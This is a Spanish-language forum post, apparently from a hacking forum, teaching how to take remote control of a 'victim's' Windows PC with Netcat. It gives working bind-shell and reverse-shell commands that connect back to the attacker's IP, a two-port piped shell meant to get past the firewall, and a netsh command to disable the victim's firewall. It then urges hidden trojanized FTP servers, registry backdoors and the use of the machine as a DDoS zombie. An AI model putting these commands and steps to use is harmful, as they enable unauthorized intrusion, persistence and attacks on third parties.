Eh... ¿Die console? esa función es nueva en el Netcat...
Yo conocía era a DETACH ó "Separado" de la consola.. Jaja..
Y sí, todo depende de lo que quieras hacer... si quieres chatear con tu víctima, sí te serviría esa linea de comandos:
"nc.exe -l -p 6000"
Con eso tú desde tu casa te conectas y le dices "Hola, soy yo".
Si quieres una Shell remota de la víctima, tienes varias (Bastantes) formas de hacerlo..
1.-en caso de que tu víctima no tenga el Firewall activado para que no te rebote la conexión..
"nc -d -e cmd.exe -l -p 6000"
2.- En caso de que tenga el Firewall Activado, pues, hagamos que sea tu victima quién te hackee a tí xD, ésto es posible porque Netcat ejecuta programas con la opción "Execute" (-e) por conexiones entrantes ó salientes, da igual:
Primero deja en tu casa un Netcat a la escucha en el puerto al que tu víctima se vaya a conectar:
"nc -v -v -l -p 6000"
Ahora ejecuta ésto en la Pc victima:
"nc -d -e cmd.exe TU_IP_Ó_DNS 6000"
¡Voilá!, tienes una shell remota, pero si quieres algo más "Educativo", sáltate el Firewall de tu víctima de la siguiente manera:
Deja en tu casa 2 shells abiertas ejecutando a Netcat en modo escucha en los puertos 80 (http) y 25 (smtp):
C:\>nc -v -v -l -p 80
C:\>nv -v -v -l -p 25
Ahora ve a dónde tu víctima y ejecuta ésto:
"nc -d TU_IP_Ó_DNS 80 | cmd | nc -d TU_IP_Ó_DNS 25"
Listo, ahora ¿Qué pasó?
Pues, deberás escribir los comandos en la Shell que dejaste escuchando en el puerto 80.. ¿Pero no te responde nada? jaja, las respuestas a los comandos que escribas por esa shell saldrán en la shell que dejaste escuchando en el puerto 25..
¡Voilá! Otra shell remota
NOTA: Es obvio que tienes que desactivar tu firewall para que la víctima se conecte contigo.
Y una vez que tengas la shell de la víctima, ¿Por qué no desactivar el de él?
C:\Documents and settings\Victima>Netsh FIREWALL set opmode mode = DISABLE
Listo, Firewall desactivado
Para activarlo de nuevo sólo escribe lo mismo y suplanta DISABLE por ENABLE
Bájale por TFTP un servidor Ftp "Troyanizado", ejecutalo ocultamente (Serv-U permite hacer eso (-h)) y tendrás vista de todos sus archivos de manera "Gráfica" y no por consola.
Agrégale al Registro de Windows uno ó varios Backdoors, tienes infinidad de formas de hacerlo.
Aprovecha a tirar tus ataques por esa shell, utilízala como Zombie para ataques D.D.O.S., no sé, sólo ponte creativo..
Autor
En línea
